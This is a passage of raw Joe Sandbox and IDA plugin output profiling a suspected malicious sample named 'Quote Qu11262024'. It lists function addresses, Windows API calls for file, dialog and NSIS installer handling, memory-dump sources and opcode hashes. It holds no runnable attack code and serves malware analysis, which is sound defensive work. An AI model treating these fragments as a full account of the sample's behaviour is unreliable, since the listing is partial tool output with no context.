                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004063A3
                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,0042A000,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 004063A8
                                                                                                      • Part of subcall function 0040633E: CharPrevA.USER32(?,?,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 004063B8
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 00404848
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404863
                                                                                                      • Part of subcall function 004049BC: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048D7,000000DF,00000000,00000400,?), ref: 00404A5A
                                                                                                      • Part of subcall function 004049BC: wsprintfA.USER32 ref: 00404A62
                                                                                                      • Part of subcall function 004049BC: SetDlgItemTextA.USER32(?,00420D30), ref: 00404A75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: 0B$A
                                                                                                    • API String ID: 2624150263-373579336
                                                                                                    • Opcode ID: 779567c049ad1b7be5732002a870fe5f12b68af335b13355a702eb919c874147
                                                                                                    • Instruction ID: 47b34843b3ec805cfc36255228536464ce330508079a4d6ac415590d573a6ccb
                                                                                                    • Opcode Fuzzy Hash: 779567c049ad1b7be5732002a870fe5f12b68af335b13355a702eb919c874147
                                                                                                    • Instruction Fuzzy Hash: 00A181B1900209ABDB11EFA5CD45AAFB7B8EF85314F10843BF601B62D1DB7C99418B6D
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                                                                    • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D7D
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D9A
                                                                                                    • wsprintfA.USER32 ref: 00405DB8
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DF3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
                                                                                                    • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA1
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNEL32(00000003,00402DF6,0042BC00,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                    • Opcode ID: 399d26b363fd6bfa952674857edeacf3f4c687ae8920f8a6bf1b59780f3b5e5d
                                                                                                    • Instruction ID: c598f6bdad383ce04f412cf173cc8d2b3b184de741377e4f3992d2474cc2d7fa
                                                                                                    • Opcode Fuzzy Hash: 399d26b363fd6bfa952674857edeacf3f4c687ae8920f8a6bf1b59780f3b5e5d
                                                                                                    • Instruction Fuzzy Hash: C631C331200B15BBD2206B75EE49F6B3A5CDF85758F14043AF981F62D2DB7CA9018ABD
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 37147D06
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 371490D7
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 371490E9
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 371490FB
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 3714910D
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 3714911F
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 37149131
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 37149143
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 37149155
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 37149167
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 37149179
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 3714918B
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 3714919D
                                                                                                      • Part of subcall function 371490BA: _free.LIBCMT ref: 371491AF
                                                                                                    • _free.LIBCMT ref: 37147CFB
                                                                                                      • Part of subcall function 3714571E: HeapFree.KERNEL32(00000000,00000000,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?), ref: 37145734
                                                                                                      • Part of subcall function 3714571E: GetLastError.KERNEL32(?,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?,?), ref: 37145746
                                                                                                    • _free.LIBCMT ref: 37147D1D
                                                                                                    • _free.LIBCMT ref: 37147D32
                                                                                                    • _free.LIBCMT ref: 37147D3D
                                                                                                    • _free.LIBCMT ref: 37147D5F
                                                                                                    • _free.LIBCMT ref: 37147D72
                                                                                                    • _free.LIBCMT ref: 37147D80
                                                                                                    • _free.LIBCMT ref: 37147D8B
                                                                                                    • _free.LIBCMT ref: 37147DC3
                                                                                                    • _free.LIBCMT ref: 37147DCA
                                                                                                    • _free.LIBCMT ref: 37147DE7
                                                                                                    • _free.LIBCMT ref: 37147DFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: c2eadf07b9fb41bf8b5775731c5f87150374ef89463a56f88b432fae2b8b94df
                                                                                                    • Instruction ID: c1c0d24c317d443771f5cddf7a2938db70c8bb38686b46d3237e59b2edd00cda
                                                                                                    • Opcode Fuzzy Hash: c2eadf07b9fb41bf8b5775731c5f87150374ef89463a56f88b432fae2b8b94df
                                                                                                    • Instruction Fuzzy Hash: 24314A77610204EFEB229A38D940BA6B7FBBF00365F90486DE859D7250DF35E980CB51
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402DC7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,0042BC00,00000400), ref: 00402DE3
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNEL32(00000003,00402DF6,0042BC00,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,0042AC00,0042AC00,0042BC00,0042BC00,80000000,00000003), ref: 00402E2C
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402F73
                                                                                                    Strings
                                                                                                    • Null, xrefs: 00402EAC
                                                                                                    • soft, xrefs: 00402EA3
                                                                                                    • Inst, xrefs: 00402E9A
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040300A
                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FBC
                                                                                                    • Error launching installer, xrefs: 00402E03
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                    • API String ID: 2803837635-3016655952
                                                                                                    • Opcode ID: 3b7fdf3be9818111248ef6fadbd0ad96985f208c194466f0e59558712b11e71f
                                                                                                    • Instruction ID: ecc3110ea449af434fd8a6ba074f2aeffe997969258775221aae52b6e548866b
                                                                                                    • Opcode Fuzzy Hash: 3b7fdf3be9818111248ef6fadbd0ad96985f208c194466f0e59558712b11e71f
                                                                                                    • Instruction Fuzzy Hash: 8161D431A40215ABDB20EF64DD89B9E7BB8EB44359F20403BF611B72D1D7789E418B9C
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(004236C0,00000400), ref: 00406221
                                                                                                    • GetWindowsDirectoryA.KERNEL32(004236C0,00000400,?,00420510,00000000,00405233,00420510,00000000), ref: 00406234
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405233,00000000,?,00420510,00000000,00405233,00420510,00000000), ref: 00406270
                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,004236C0), ref: 0040627E
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040628A
                                                                                                    • lstrcatA.KERNEL32(004236C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AE
                                                                                                    • lstrlenA.KERNEL32(004236C0,?,00420510,00000000,00405233,00420510,00000000,00000000,00000000,00000000), ref: 00406300
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004061F0
                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004062A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 717251189-730719616
                                                                                                    • Opcode ID: d40179d1081cbbc5678ec4f737ab6291fe64bb2fb90f27f2e2306d5d1eb1c8ca
                                                                                                    • Instruction ID: fc6e9f960b511357ceabef78db8b274e3b367e60918ad55153a6f3bd2d562e67
                                                                                                    • Opcode Fuzzy Hash: d40179d1081cbbc5678ec4f737ab6291fe64bb2fb90f27f2e2306d5d1eb1c8ca
                                                                                                    • Instruction Fuzzy Hash: EA61F131A00110AADF20AF24C9847BE3BA4EB96310F52417FE953BA2D1C73C4962DB5E
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 371459EA
                                                                                                      • Part of subcall function 3714571E: HeapFree.KERNEL32(00000000,00000000,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?), ref: 37145734
                                                                                                      • Part of subcall function 3714571E: GetLastError.KERNEL32(?,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?,?), ref: 37145746
                                                                                                    • _free.LIBCMT ref: 371459F6
                                                                                                    • _free.LIBCMT ref: 37145A01
                                                                                                    • _free.LIBCMT ref: 37145A0C
                                                                                                    • _free.LIBCMT ref: 37145A17
                                                                                                    • _free.LIBCMT ref: 37145A22
                                                                                                    • _free.LIBCMT ref: 37145A2D
                                                                                                    • _free.LIBCMT ref: 37145A38
                                                                                                    • _free.LIBCMT ref: 37145A43
                                                                                                    • _free.LIBCMT ref: 37145A51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 789c0b58725d6887f39063d35ee8111d673ba535dfcaaadd45d60d361696e793
                                                                                                    • Instruction ID: 04fd40727fe327e0fe4571c487775fd87493ce544fec49865a689acfcd7f88fd
                                                                                                    • Opcode Fuzzy Hash: 789c0b58725d6887f39063d35ee8111d673ba535dfcaaadd45d60d361696e793
                                                                                                    • Instruction Fuzzy Hash: E511607B520148EFCB11DF95D841CDD3FBAFF04251B9581A5BA088B229DE36EB509B82
                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D1B
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37141D37
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D4B
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D58
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D7D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1454806937-0
                                                                                                    • Opcode ID: 0d7a3a403ada2a361ccf70195d9d1a350b7f9dbf35bb5aac053a10e859ce2a08
                                                                                                    • Instruction ID: cd2fd92241007386ca48f8e184ba945c92544dc63cd21ff4d53562232455cc13
                                                                                                    • Opcode Fuzzy Hash: 0d7a3a403ada2a361ccf70195d9d1a350b7f9dbf35bb5aac053a10e859ce2a08
                                                                                                    • Instruction Fuzzy Hash: 24217CB294121CBFEB119BA0CC8DEEA76BCEB08354F4105A5F655F3140D6789E469B70
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041F7
                                                                                                    • GetSysColor.USER32(00000000), ref: 00404235
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404241
                                                                                                    • SetBkMode.GDI32(?,?), ref: 0040424D
                                                                                                    • GetSysColor.USER32(?), ref: 00404260
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404270
                                                                                                    • DeleteObject.GDI32(?), ref: 0040428A
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                                    • Instruction ID: 52c6a6951caa399060ec8b38b53272cb2a551d95d69ed30fa1f6d562fb6cbf50
                                                                                                    • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                                    • Instruction Fuzzy Hash: 5B2165716007049BCB319F68D948B5B7BF8AF81754B04897EFA96A22E0D738E854CB54
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37149C07,?,00000000,?,00000000,00000000), ref: 371494D4
                                                                                                    • __fassign.LIBCMT ref: 3714954F
                                                                                                    • __fassign.LIBCMT ref: 3714956A
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 37149590
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,37149C07,00000000,?,?,?,?,?,?,?,?,?,37149C07,?), ref: 371495AF
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,37149C07,00000000,?,?,?,?,?,?,?,?,?,37149C07,?), ref: 371495E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 9846f160b19fe49a3487a5a8467de335a23ea1597de0a10188f7aa722fe5115c
                                                                                                    • Instruction ID: 8fac64162f5c469bc4beadb67c27a8c9e5e1a94115fd47ed30fcc97b4d9fdcc1
                                                                                                    • Opcode Fuzzy Hash: 9846f160b19fe49a3487a5a8467de335a23ea1597de0a10188f7aa722fe5115c
                                                                                                    • Instruction Fuzzy Hash: 5B51F4B2E04209AFDB11CFA8D895AEEBBF8FF08310F10415AE955F7281D730A951CB61
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 3714339B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 371433A3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 37143431
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 3714345C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 371434B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 4ffd8c1101653e627160a9f325c4639be797e8de0f8184e2124882e364e7b09d
                                                                                                    • Instruction ID: 6ac0112a1765a0e17b7407911ea5bfd2b6c5bde3dc75e25d185597ea3adffbb8
                                                                                                    • Opcode Fuzzy Hash: 4ffd8c1101653e627160a9f325c4639be797e8de0f8184e2124882e364e7b09d
                                                                                                    • Instruction Fuzzy Hash: 9D41D47AA002089BCF02CF68CC44ADEBBB5BF49334F948155E915BB391D735EA15CB92
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                    • lstrlenA.KERNEL32(00402D8B,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                    • lstrcatA.KERNEL32(00420510,00402D8B,00402D8B,00420510,00000000,00000000,00000000), ref: 00405257
                                                                                                    • SetWindowTextA.USER32(00420510,00420510), ref: 00405269
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2531174081-0
                                                                                                    • Opcode ID: b8810ef0ff581cc93021c6b5d9a35f33efec56338cc0de2958aa334abbd55611
                                                                                                    • Instruction ID: 09b19f042309e47acee5650f88afd0d12d3a1540eb7d8618ae31c51346f6e7a0
                                                                                                    • Opcode Fuzzy Hash: b8810ef0ff581cc93021c6b5d9a35f33efec56338cc0de2958aa334abbd55611
                                                                                                    • Instruction Fuzzy Hash: 6D218C71A00118BBDB119FA9DD8099EBFB9EF08354F04807AF544B6291C7798E418F98
                                                                                                    APIs
                                                                                                      • Part of subcall function 37149221: _free.LIBCMT ref: 3714924A
                                                                                                    • _free.LIBCMT ref: 371492AB
                                                                                                      • Part of subcall function 3714571E: HeapFree.KERNEL32(00000000,00000000,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?), ref: 37145734
                                                                                                      • Part of subcall function 3714571E: GetLastError.KERNEL32(?,?,3714924F,?,00000000,?,00000000,?,37149276,?,00000007,?,?,37147E5A,?,?), ref: 37145746
                                                                                                    • _free.LIBCMT ref: 371492B6
                                                                                                    • _free.LIBCMT ref: 371492C1
                                                                                                    • _free.LIBCMT ref: 37149315
                                                                                                    • _free.LIBCMT ref: 37149320
                                                                                                    • _free.LIBCMT ref: 3714932B
                                                                                                    • _free.LIBCMT ref: 37149336
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction ID: 682540b41e75a0d66cca3b9f0c0a12aaa056e92c8f7dd521ec0ffa36a6842565
                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction Fuzzy Hash: 0F112E73544B08FADA20ABF0DC45FCB7BBFAF04700F814875A699B6192DE69B6048752
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402D2C
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D4A
                                                                                                    • wsprintfA.USER32 ref: 00402D78
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(00420510,00402D8B,00402D8B,00420510,00000000,00000000,00000000), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(00420510,00420510), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D9C
